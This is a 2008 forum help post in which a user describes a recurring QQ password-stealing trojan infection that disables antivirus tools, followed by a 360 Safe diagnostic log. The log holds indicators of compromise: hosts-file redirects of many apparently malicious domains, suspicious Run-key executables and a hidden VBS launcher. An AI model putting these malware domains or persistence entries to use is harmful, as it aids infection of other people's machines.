Title: [Virus Discussion] Moderators and experts, please come in (Views: 2072, Replies: 9)
zhuwy1
Posted 2008-3-25 13:23
This post was published on the 我是网管 forum; post URL: http://bbs.54master.com/238720,1,1
Yesterday a colleague told me that someone had logged into his QQ, so I checked carefully and deleted an AUTORUN file on the E: drive, confirmed to be a Trojan.QQPASS.XX trojan. The deletion itself was no big deal, but right after it (my world started snowing) my BSY began alarming, popping up that PAHZIJ.DLL was infected and Trojan.OLG.uln had been found, followed by a whole pile of trojans. I went through this several times, scanned in safe mode, and even restored the image; within 2 minutes of entering the system it all comes back. I suspect the other drives are infected too, but I can't find anything and don't know what to do. Hoping the moderators and experts can offer some advice. (Temporarily resolved, but I dare not reboot.)

Addendum: it shuts down specified AV products (luckily mine is BXY, which the author probably has never seen).

Image hijacking (映象劫持) of 360安全卫士 and most AV products. Other applications (purple area).


Loads strange services.


There was also a suspicious IP connection; I wrote it down in a Notepad file but carelessly named it 360, and after the virus cleanup that file was nowhere to be found.


Attached 360 log:


该诊断报告由360安全卫士提供 http://www.360safe.com
诊断时间: 2008-03-25  11:49:51
诊断平台: Microsoft Windows 2000  Service Pack 4
IE版本: Internet Explorer V6.0.2800.1106 Build:62800.1106
计算机物理内存:495.48MB - 当前可用内存:164.61MB

100 - 未知 - Process: BarServer.exe [BarServer应用程序] - C:\Program Files\CWH\BarServer.exe - 35ef750b4f347855bab4690832c14c86
100 - 未知 - Process: Pphidpad.exe [] - D:\WINPENJR\Win32\pphidpad.exe - 62336165306432653936643531316264
100 - 未知 - Process: BarServerManager.exe [BarServerManager Microsoft 基础类应用程序] - C:\Program Files\CWH\BarServer.exe - fce24967ba81b1a24b89734d0d277bc9
100 - 未知 - Process: rundll32.exe [Windows Shell Common Dll] - C:\WINNT\system32\rundll32.exe C:\WINNT\system32\shell32.dll,OpenAs_RunDLL C:\WINNT\help\bai.VBS -
100 - 未知 - Process: PubwinConsole.exe [] - D:\Program Files\Hintsoft\PubwinConsole\PubwinConsole.exe - 66306466623138383139386137343634
100 - 未知 - Process: 360compkill.exe [] - C:\Documents and Settings\Administrator.QW\桌面\360compkill.exe -
100 - 未知 - Process: KillerSet.exe [] - C:\DOCUME~1\ADMINI~1.QW\LOCALS~1\Temp\RarSFX0\KillerSet.exe - 61366532366636643333663635613132
100 - 未知 - Process: Wsyscheck.exe [Wsyscheck] - E:\网络学院\软件\进程查看器\进程查看器\Wsyscheck.exe - f4e495056f7310daca6c8aa031e88910
100 - 未知 - Process: cmdCheckTools.exe [] - C:\DOCUME~1\ADMINI~1.QW\LOCALS~1\Temp\RarSFX0\check\cmdCheckTools.exe - 31343765396335396635303734336664
O1 - 未知 - Host: 127.0.0.1 yu.8s7.net
O1 - 未知 - Host: 127.0.0.1 1.jopanqc.com
O1 - 未知 - Host: 127.0.0.1 2.joppnqq.com
O1 - 未知 - Host: 127.0.0.1 wg.47255.com
O1 - 未知 - Host: 127.0.0.1 1.joppnqq.com
O1 - 未知 - Host: 127.0.0.1 xxx.m111.biz
O1 - 未知 - Host: 127.0.0.1 1.jopenqc.com
O1 - 未知 - Host: 127.0.0.1 1.jopenkk.com
O1 - 未知 - Host: 127.0.0.1 xxx.vh7.biz
O1 - 未知 - Host: 127.0.0.1 xxx.j41m.com
O1 - 未知 - Host: 127.0.0.1 3.joppnqq.com
O1 - 未知 - Host: 127.0.0.1 d.93se.com
O1 - 未知 - Host: 127.0.0.1 www.868wg.com
O1 - 未知 - Host: 127.0.0.1 xxx.mmma.biz
O1 - 未知 - Host: 127.0.0.1 ilove.com
O1 - 未知 - Host: 127.0.0.1 tp.shpzhan.cn
O1 - 未知 - Host: 127.0.0.1 www.tomwg.com
O1 - 未知 - Host: 127.0.0.1 www.cike007.cn
O1 - 未知 - Host: 127.0.0.1 www.22aaa.com
O1 - 未知 - Host: 127.0.0.1 xx.exiao01.com
O1 - 未知 - Host: 127.0.0.1 www.exiao01.com
O1 - 未知 - Host: 127.0.0.1 www.exiao01.com
O1 - 未知 - Host: 127.0.0.1 new.749571.com
O1 - 未知 - Host: 127.0.0.1 xtx.kv8.info
O1 - 未知 - Host: 127.0.0.1 cao.kv8.info
O1 - 未知 - Host: 127.0.0.1 1.jopmmqq.com
O1 - 未知 - Host: 127.0.0.1 171817.171817.com
O1 - 未知 - Host: 127.0.0.1 d2.llsging.com
O1 - 未知 - Host: 127.0.0.1 down.malasc.cn
O1 - 未知 - Host: 127.0.0.1 llboss.com
O1 - 未知 - Host: 127.0.0.1 nx.51ylb.cn
O1 - 未知 - Host: 127.0.0.1 my.531jx.cn
O1 - 未知 - Host: 127.0.0.1 qqq.dzydhx.com
O1 - 未知 - Host: 127.0.0.1 qqq.hao1658.com
O1 - 未知 - Host: 127.0.0.1 www.333292.com
O1 - 未知 - Host: 127.0.0.1 down.18dd.net
O1 - 未知 - Host: 127.0.0.1 up.22x44.com
O1 - 未知 - Host: 127.0.0.1 gxgxy.net
O2 - 未知 - BHO: (浏览器辅助对象(BHO)) - [] - {D29DCEE0-457B-45A2-A92D-741B95B7723B} - C:\Program Files\Internet Explorer\PLUGINS\NewSys55.Sys
O4 - 未知 - HKLM\..\Run: [BarServer] [BarServer应用程序] C:\Program Files\CWH\BarServer.exe
O4 - 未知 - HKLM\..\Run: [uslvitok] [] C:\WINNT\svtkqrgc.exe
O4 - 未知 - HKLM\..\Run: [SHAProc] [] C:\WINNT\SHAProc.exe
O22 - 未知 - Filename Extention: .reg - regedit.exe %1
O23 - 未知 - Service: TrkSvr [保存文件在域中卷之间移动的信息。] - C:\WINNT\system32\services.exe - (not running)
O23 - 未知 - Service: helpsvc [Help and Support] -  - (not running)

=======================================
100 - 安全 - Process: smss.exe [该进程为会话管理子系统用以初始化系统变量,ms-dos驱动名称类似lpt1以及com,调用win32壳子系统和运行在windows登陆过程。] - C:\WINNT\System32\smss.exe - ea4ce4c598b8d5d3e596a99b092b2f4a
100 - 安全 - Process: csrss.exe [客户端服务子系统,用以控制windows图形相关子系统。] - C:\WINNT\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512,512 Windows=On SubSystemType=Windows ServerDll=ba - 98d0190eb2d1b148beca121fad6ee7e3
100 - 安全 - Process: WINLOGON.EXE [windows nt用户登陆程序。] - C:\WINNT\system32\winlogon.exe - f81baa5910dcd5a14cfccca5e8b19a42
100 - 安全 - Process: SERVICES.EXE [用于管理windows服务系统进程。] - C:\WINNT\system32\services.exe - b88403257d2dae16b35315b06ef35476
100 - 安全 - Process: LSASS.EXE [本地安全权限服务控制windows安全机制。] - C:\WINNT\system32\lsass.exe - 4b8380c733f476d89541f63d00dc2734
100 - 安全 - Process: DefWatch.exe [norton anti-virus扫描你的文件和email以检查病毒。] - C:\Program Files\Symantec AntiVirus\DefWatch.exe - 52be5fa2d926ef54915c979f180a59e0
100 - 安全 - Process: LLSSRV.EXE [windows自带的许可证日志记录服务。] - C:\WINNT\System32\llssrv.exe - 6f8bdcbe2908cbd8e52f43de007b2403
100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] - C:\WINNT\system32\svchost -k rpcss - 1af0b453a17446b2c8fe88252832050b
100 - 安全 - Process: SavRoam.exe [赛门铁克公司出品的防病毒软件的相关程序。] - C:\Program Files\Symantec AntiVirus\SavRoam.exe - dfe848a5df5ce9b50f5abf154dc69805
100 - 安全 - Process: stisvc.exe [still image service用于控制扫描仪和数码相机连接在windows。] - C:\WINNT\system32\stisvc.exe - 628fbdf765bf190f23e53e2c59fd49e7
100 - 安全 - Process: Rtvscan.exe [norton anti-virus用以扫描你的文件和email中的病毒。] - C:\Program Files\Symantec AntiVirus\Rtvscan.exe - e099a2d22f6a62aeaef388e36803c96a
100 - 安全 - Process: winmgmt.exe [windows management service透过windows management instrumentation data (wmi)技术处理来自应用客户端的请求。] - C:\WINNT\System32\WBEM\WinMgmt.exe - 3562c1955c89f59da089f925d21c60d3
100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] - C:\WINNT\system32\svchost.exe -k netsvcs - 1af0b453a17446b2c8fe88252832050b
100 - 安全 - Process: msdtc.exe [microsoft distributed transaction coordinator控制多个服务器的传输,被安装在microsoft personal web server和microsoft sql server。] - C:\WINNT\system32\msdtc.exe - 9c9c2cc54c354a7616342c6143d87156
100 - 安全 - Process: mstask.exe [windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。] - C:\WINNT\system32\MSTask.exe - 575358c3d1cdf4cb44dba84fd1018d8c
100 - 安全 - Process: explorer.exe [windows program manager或者windows explorer用于控制windows图形shell,包括开始菜单、任务栏,桌面和文件管理。] - C:\WINNT\Explorer.EXE - e3df70147a75533c9308f0dd16baaef5
100 - 安全 - Process: hkcmd.exe [intel显卡驱动相关软件。] - C:\WINNT\system32\hkcmd.exe - 4156c2981fe599005368b6155acac4c0
100 - 安全 - Process: SOUNDMAN.EXE [一个软声卡控制台软件。] - C:\WINNT\SOUNDMAN.EXE - e0584ee5e7f07f04a879b19a37465588
100 - 安全 - Process: VPTray.exe [norton antivirus ce企业版杀毒软件的系统托盘。] - C:\PROGRA~1\SYMANT~1\VPTray.exe - 9f497e184cb10c3f648e434abf271dba
100 - 安全 - Process: internat.exe [输入控制图标用于更改类似国家设置、键盘类型和日期格式。] - C:\WINNT\system32\internat.exe - 2061f6ff47f6938d95c18e3a1a8cf7e2
100 - 安全 - Process: svchost.exe [service host process是一个标准的动态连接库主机处理服务。] - C:\WINNT\System32\svchost.exe -k tapisrv - 1af0b453a17446b2c8fe88252832050b
100 - 安全 - Process: CMD.EXE [windows控制台程序。不像旧的command.com,cmd.exe是一个32位的命令行使用在winnt/2000/xp。] - C:\WINNT\system32\cmd.exe - 29c65068bc8a39e8c09c2331489f72f2
100 - 安全 - Process: CMD.EXE [windows控制台程序。不像旧的command.com,cmd.exe是一个32位的命令行使用在winnt/2000/xp。] - C:\WINNT\system32\CMD.EXE - 29c65068bc8a39e8c09c2331489f72f2
100 - 安全 - Process: conime.exe [console ime ime输入法控制台软件。] - C:\WINNT\system32\conime.exe - 02ae95f8b6e38bdfb99c7aa097f1d961
100 - 安全 - Process: IEXPLORE.EXE [microsoft internet explorer浏览器用于浏览网页。] - C:\Program Files\Internet Explorer\iexplore.exe - 745bd428a55c8c2fdacf167cbc16a34f
100 - 安全 - Process: NOTEPAD.EXE [notepad字符编辑器用于打开文档。在windows中附带。] - C:\WINNT\notepad.exe - d1e0cd535de36c0854bbef2edc973d29
R1 - 安全 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINNT\system32\blank.htm
R1 - 安全 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINNT\system32\blank.htm
O3 - 安全 - Toolbar: (@msdxmLC.dll,-1@2052,电台(&R)) - [是Windows Media Player播放器ActiveX控制相关文件。] - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\system32\msdxm.ocx
O3 - 安全 - Toolbar: (卡卡上网安全助手) - [卡卡安全助手工具条软件相关程序。] - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINNT\system32\kakatool.dll
O4 - 安全 - HKLM\..\Run: [IgfxTray] [是Intel显卡配置和诊断程序,会同Intel 810芯片组的集成显卡安装。] C:\WINNT\system32\igfxtray.exe
O4 - 安全 - HKLM\..\Run: [HotKeysCmds] [是Intel显示卡相关程序,用于配置和诊断相关设备。] C:\WINNT\system32\hkcmd.exe
O4 - 安全 - HKLM\..\Run: [SoundMan] [Realtek声卡相关程序。] SOUNDMAN.EXE
O4 - 安全 - HKLM\..\Run: [vptray] [诺顿在任务栏显示病毒防护盾牌图标的程序] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - 安全 - HKLM\..\Run: [PPHIDPAD] [小蒙恬手写板驱动。] D:\WINPENJR\Win32\pphidpad.exe
O4 - 安全 - HKLM\..\Run: [360Safetray] [360safe实时保护功能模块。] E:\360safe\safemon\360tray.exe /start
O4 - 安全 - HKCU\..\Run: [Internat.exe] [输入法在任务栏里的图标] internat.exe
O4 - 安全 - HKCU\..\Run: [ctfmon.exe] [office xp输入法图标。] C:\WINNT\system32\ctfmon.exe
O9 - 安全 - Extra button: 电台(HKLM) - C:\WINNT\web\related.htm
O16 - 安全 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Flash播放器) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O23 - 安全 - Service: DefWatch [诺顿防毒软件相关程序。] - "C:\Program Files\Symantec AntiVirus\DefWatch.exe" - (running)
O23 - 安全 - Service: Fax [微软Microsoft传真服务相关程序,该服务允许用户创建和发送传真到微软Office组件中。] - C:\WINNT\system32\faxsvc.exe - (not running)
O23 - 安全 - Service: NtFrs [在多个服务器间维护文件目录内容的文件同步。] - C:\WINNT\system32\ntfrs.exe - (not running)
O23 - 安全 - Service: SavRoam [诺顿防毒软件相关程序] - "C:\Program Files\Symantec AntiVirus\SavRoam.exe" - (running)
O23 - 安全 - Service: Symantec AntiVirus [诺顿防毒软件相关程序。] - "C:\Program Files\Symantec AntiVirus\Rtvscan.exe" - (running)

=======================================
O31 - 未知 - Folder Menu: {7f9609be-af9a-11d1-83e0-00c04fb6e984} - C:\WINNT\system32\faxshell.dll - Microsoft Corporation - Fax Tiff Data Column Provider - 5.0.2134.1 - 8464 - 9dc8a8c3d8cbb925796aca18fd7cd7a5
O31 - 未知 - Folder Menu: {884EA37B-37C0-11d2-BE3F-00A0C9A83DA1} - C:\WINNT\system32\docprop2.dll - Microsoft Corporation - DocProp2 - 5.0.2178.1 - 304912 - a4769f665cdd13f51b1e20013bb8a21f
O31 - 未知 - Notify: crypt32chain - C:\WINNT\system32\crypt32.dll - Microsoft Corporation - Crypto API32 - 5.131.2195.6926 - 563984 - 49f8e15fc5d52bd6220f1eff38129452
O31 - 未知 - Notify: cryptnet - C:\WINNT\system32\cryptnet.dll - Microsoft Corporation - Crypto Network Related API - 5.131.2195.6926 - 63760 - 64300730e80ea464cd5e7302ede040ed
O31 - 未知 - Notify: cscdll - C:\WINNT\system32\cscdll.dll - Microsoft Corporation - Offline Network Agent - 5.0.2195.6713 - 101136 - eda6cb35feb04f73d442532309d3f2e8
O31 - 未知 - Notify: igfxcui - C:\WINNT\system32\igfxsrvc.dll - Intel Corporation - igfxsrvc Module - 3.0.0.3847 - 344064 - 6561cac76ce0b95bc822cc2668791ea4
O31 - 未知 - Notify: sclgntfy - C:\WINNT\system32\sclgntfy.dll - Microsoft Corporation - Secondary Logon Service Notification DLL - 5.0.2195.6608 - 20752 - 4942545703889ec39e671d84bf4f5a3e
O31 - 未知 - Notify: SensLogn - C:\WINNT\system32\WlNotify.dll - Microsoft Corporation - Common DLL to receive Winlogon notifications - 5.0.2195.7000 - 57104 - 435dd37315846d976445a084e5cbaffd
O31 - 未知 - Notify: termsrv - C:\WINNT\system32\wlnotify.dll - Microsoft Corporation - Common DLL to receive Winlogon notifications - 5.0.2195.7000 - 57104 - 435dd37315846d976445a084e5cbaffd
O31 - 未知 - Notify: wzcnotif - C:\WINNT\system32\wzcdlg.dll - Microsoft Corporation - Wireless Zero Configuration Service UI - 5.0.2195.6604 - 52496 - 752c43e74027c22db1d1ef45431c1552
O31 - 未知 - SODL: {7007ACCF-3202-11D1-AAD2-00805FC1270E} - C:\WINNT\system32\NETSHELL.dll - Microsoft Corporation - Network Connections Shell - 5.0.2195.6604 - 477456 - 0702530277f8fc00ab11353feb5ebc48
O31 - 未知 - SODL: {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SODL: {35CEC8A3-2BE6-11D2-8773-92E220524153} - C:\WINNT\system32\stobject.dll - Microsoft Corporation - Systray shell service object - 5.0.2195.6601 - 81168 - edbf9015ca69b907d213ff92bc16ca2a
O31 - 未知 - SEApproved: {00022613-0000-0000-C000-000000000046} - C:\WINNT\system32\mmsys.cpl - Microsoft Corporation - Control Panel Drivers Applet - 5.0.2161.1 - 303888 - 39307bf7e4c57c60ffb26ba1191cf848
O31 - 未知 - SEApproved: {176d6597-26d3-11d1-b350-080036a75b03} - C:\WINNT\system32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: {1F2E5C40-9550-11CE-99D2-00AA006E086C} - C:\WINNT\system32\rshx32.dll - Microsoft Corporation - Security Shell Extension - 5.0.2195.6613 - 35088 - a56d47240d182286b5282f76f38ac1a4
O31 - 未知 - SEApproved: {3EA48300-8CF6-101B-84FB-666CCB9BCD32} - C:\WINNT\system32\docprop.dll - Microsoft Corporation - OLE DocFile Property Page - 5.0.2134.1 - 43280 - 99c9cfe46938664698db93dacd2e4559
O31 - 未知 - SEApproved: {40dd6e20-7c17-11ce-a804-00aa003ca9f6} - C:\WINNT\system32\ntshrui.dll - Microsoft Corporation - Shell extensions for sharing - 5.0.2134.1 - 47888 - 89ed3a9e1f760bd30db6da2f93d9e71a
O31 - 未知 - SEApproved: {41E300E0-78B6-11ce-849B-444553540000} - C:\WINNT\system32\plustab.dll - Microsoft Corporation - Effects Control Panel extension - 5.0.2134.1 - 20752 - 780d3db3b4832ed07cb4c310294e4fc1
O31 - 未知 - SEApproved: {42071712-76d4-11d1-8b24-00a0c9068ff3} - C:\WINNT\system32\deskadp.dll - Microsoft Corporation - Advanced display adapter properties - 5.0.2920.0 - 13072 - e51adc560410d3c270e78e41656224a7
O31 - 未知 - SEApproved: {42071713-76d4-11d1-8b24-00a0c9068ff3} - C:\WINNT\system32\deskmon.dll - Microsoft Corporation - Advanced display monitor properties - 5.0.2920.0 - 14096 - 3b84b3fd7965488a3d83ced2d14c3c14
O31 - 未知 - SEApproved: {42071714-76d4-11d1-8b24-00a0c9068ff3} - deskpan.dll -  -  -  - 0 -
O31 - 未知 - SEApproved: {4E40F770-369C-11d0-8922-00A024AB2DBB} - C:\WINNT\system32\dssec.dll - Microsoft Corporation - Directory Service Security UI - 5.0.2195.6623 - 28944 - 7c65f77a04b2e3ac5df47ff86e0edfcb
O31 - 未知 - SEApproved: {56117100-C0CD-101B-81E2-00AA004AE837} - C:\WINNT\system32\shscrap.dll - Microsoft Corporation - Shell scrap object handler - 5.0.2134.1 - 23312 - fac37c24ed8cf4e4d6a7de11d5b6fbbb
O31 - 未知 - SEApproved: {59099400-57FF-11CE-BD94-0020AF85B590} - C:\WINNT\system32\diskcopy.dll - Microsoft Corporation - Windows DiskCopy - 5.0.2195.6601 - 16144 - df03f95f5216e6d612f7925c83c2c263
O31 - 未知 - SEApproved: {59be4990-f85c-11ce-aff7-00aa003ca9f6} - C:\WINNT\system32\ntlanui2.dll - Microsoft Corporation - Network object shell UI - 5.0.2134.1 - 15632 - d6da1271af84a6ea40042c802dbd9da3
O31 - 未知 - SEApproved: {5DB2625A-54DF-11D0-B6C4-0800091AA605} - C:\WINNT\System32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: {675F097E-4C4D-11D0-B6C1-0800091AA605} - C:\WINNT\system32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: 无效的CLSID:Shell extensions for file compression -  -  -  -  - 0 -
O31 - 未知 - SEApproved: {77597368-7b15-11d0-a0c2-080036af3f03} - C:\WINNT\system32\printui.dll - Microsoft Corporation - Print UI DLL - 5.0.2195.6702 - 381712 - c64f2a957ce05de2f167ab42cdfcf821
O31 - 未知 - SEApproved: {7988B573-EC89-11cf-9C00-00AA00A14F56} - C:\WINNT\system32\dskquoui.dll - Microsoft Corporation - Windows Shell Disk Quota UI DLL - 5.0.2195.6601 - 146192 - c5388ad80f85070ed6915b77939c1b62
O31 - 未知 - SEApproved: 无效的CLSID:加密上下文菜单 -  -  -  -  - 0 -
O31 - 未知 - SEApproved: {85BBD920-42A0-1069-A2E4-08002B30309D} - C:\WINNT\system32\syncui.dll - Microsoft Corporation - Windows Briefcase - 5.0.2134.1 - 166672 - a959dac0c3a546f3d690b422d4ce11c1
O31 - 未知 - SEApproved: {88895560-9AA2-1069-930E-00AA0030EBC8} - C:\WINNT\system32\hticons.dll - Hilgraeve, Inc. - HyperTerminal Applet Library - 5.0.2195.6684 - 21776 - cb2797bb4df9e1fd0a1bf4730fa269d4
O31 - 未知 - SEApproved: {BD84B380-8CA2-1069-AB1D-08000948F534} - C:\WINNT\system32\fontext.dll - Microsoft Corporation - Windows Font Folder - 5.0.2195.6601 - 200976 - ec981e4a596776aaf1464ff857d39ea7
O31 - 未知 - SEApproved: {DBCE2480-C732-101B-BE72-BA78E9AD5B27} - C:\WINNT\system32\icmui.dll - Microsoft Corporation - Microsoft Color Matching System User Interface DLL - 5.0.2180.1 - 51472 - 12f00a958fd9aa06b7086f57666e900e
O31 - 未知 - SEApproved: {F37C5810-4D3F-11d0-B4BF-00AA00BBB723} - C:\WINNT\system32\rshx32.dll - Microsoft Corporation - Security Shell Extension - 5.0.2195.6613 - 35088 - a56d47240d182286b5282f76f38ac1a4
O31 - 未知 - SEApproved: {f81e9010-6ea4-11ce-a7ff-00aa003ca9f6} - C:\WINNT\system32\ntshrui.dll - Microsoft Corporation - Shell extensions for sharing - 5.0.2134.1 - 47888 - 89ed3a9e1f760bd30db6da2f93d9e71a
O31 - 未知 - SEApproved: {f92e8c40-3d33-11d2-b1aa-080036a75b03} - C:\WINNT\system32\deskperf.dll - Microsoft Corporation - Advanced display performance properties - 5.0.2134.1 - 14096 - f790a222947407207181373b3add2d03
O31 - 未知 - SEApproved: {60254CA5-953B-11CF-8C96-00AA00B8708C} - C:\WINNT\system32\wshext.dll - Microsoft Corporation - Microsoft (r) Shell Extension for Windows Script Host - 5.6.0.6626 - 65585 - 4c252e9e26df05f93f1740e2d4f2bb9d
O31 - 未知 - SEApproved: {7444C717-39BF-11D1-8CD9-00C04FC29D45} - C:\WINNT\system32\cryptext.dll - Microsoft Corporation - Crypto Shell Extensions - 5.131.2181.1 - 49424 - 37c4bb48a2ebee5eb3bdc8cf92b683cb
O31 - 未知 - SEApproved: {7444C719-39BF-11D1-8CD9-00C04FC29D45} - C:\WINNT\system32\cryptext.dll - Microsoft Corporation - Crypto Shell Extensions - 5.131.2181.1 - 49424 - 37c4bb48a2ebee5eb3bdc8cf92b683cb
O31 - 未知 - SEApproved: {7007ACC7-3202-11D1-AAD2-00805FC1270E} - C:\WINNT\system32\NETSHELL.dll - Microsoft Corporation - Network Connections Shell - 5.0.2195.6604 - 477456 - 0702530277f8fc00ab11353feb5ebc48
O31 - 未知 - SEApproved: {DD2110F0-9EEF-11cf-8D8E-00AA0060F5BF} - C:\WINNT\system32\mstask.dll - Microsoft Corporation - Task Scheduler interface DLL - 4.71.2195.6972 - 218896 - 60ed7847b950e1409e666522c1f3b6e0
O31 - 未知 - SEApproved: {797F1E90-9EDD-11cf-8D8E-00AA0060F5BF} - C:\WINNT\system32\mstask.dll - Microsoft Corporation - Task Scheduler interface DLL - 4.71.2195.6972 - 218896 - 60ed7847b950e1409e666522c1f3b6e0
O31 - 未知 - SEApproved: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} - C:\WINNT\system32\mstask.dll - Microsoft Corporation - Task Scheduler interface DLL - 4.71.2195.6972 - 218896 - 60ed7847b950e1409e666522c1f3b6e0
O31 - 未知 - SEApproved: {1A9BA3A0-143A-11CF-8350-444553540000} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {20D04FE0-3AEA-1069-A2D8-08002B30309D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {86747AC0-42A0-1069-A2E6-08002B30309D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {0AFACED1-E828-11D1-9187-B532F1E9575D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {12518493-00B2-11d2-9FA5-9E3420524153} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {21B22460-3AEA-1069-A2DC-08002B30309D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {B091E540-83E3-11CF-A713-0020AFD79762} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {FBF23B41-E3F0-101B-8488-00AA003E56F8} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {C2FBB630-2971-11d1-A18C-00C04FD75D13} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {C2FBB631-2971-11d1-A18C-00C04FD75D13} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {13709620-C279-11CE-A49E-444553540000} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {62112AA1-EBE4-11cf-A5FB-0020AFE7292D} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {4622AD11-FF23-11d0-8D34-00A0C90F2719} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {7BA4C740-9E81-11CF-99D3-00AA004AE837} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {D969A300-E7FF-11d0-A93B-00A0C90F2719} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {09799AFB-AD67-11d1-ABCD-00C04FC30936} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {3FC0B520-68A9-11D0-8D77-00C04FD70822} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {75048700-EF1F-11D0-9888-006097DEACF9} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {6D5313C0-8C62-11D1-B2CD-006097DF8C11} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {57651662-CE3E-11D0-8D77-00C04FC99D61} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {4657278A-411B-11d2-839A-00C04FD918D0} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {A470F8CF-A1E8-4f65-8335-227475AA5C46} - C:\WINNT\system32\shell32.dll - Microsoft Corporation - Windows Shell Common Dll - 5.0.3900.7105 - 2362640 -
O31 - 未知 - SEApproved: {9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} - C:\WINNT\system32\sendmail.dll - Microsoft Corporation - Send Mail - 5.50.4807.2300 - 18704 - 3309d4df230f386c5fceac5521dbf727
O31 - 未知 - SEApproved: {9E56BE61-C50F-11CF-9A2C-00A0C90A90CE} - C:\WINNT\system32\sendmail.dll - Microsoft Corporation - Send Mail - 5.50.4807.2300 - 18704 - 3309d4df230f386c5fceac5521dbf727
O31 - 未知 - SEApproved: {88C6C381-2E85-11D0-94DE-444553540000} - C:\WINNT\system32\occache.dll - Microsoft Corporation - Object Control Viewer - 6.0.2800.1106 - 87552 - 0cd724188742f6c93e6d3ae6bfb5dbdd
O31 - 未知 - SEApproved: {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {ABBE31D0-6DAE-11D0-BECA-00C04FD940BE} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {F5175861-2688-11d0-9C5E-00AA00A45957} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
O31 - 未知 - SEApproved: {08165EA0-E946-11CF-9C87-00AA005127ED} - C:\WINNT\system32\webcheck.dll - Microsoft Corporation - Web Site Monitor - 6.0.2800.1106 - 258048 - 69c04aedf62949d981a71efa2d9a76f7
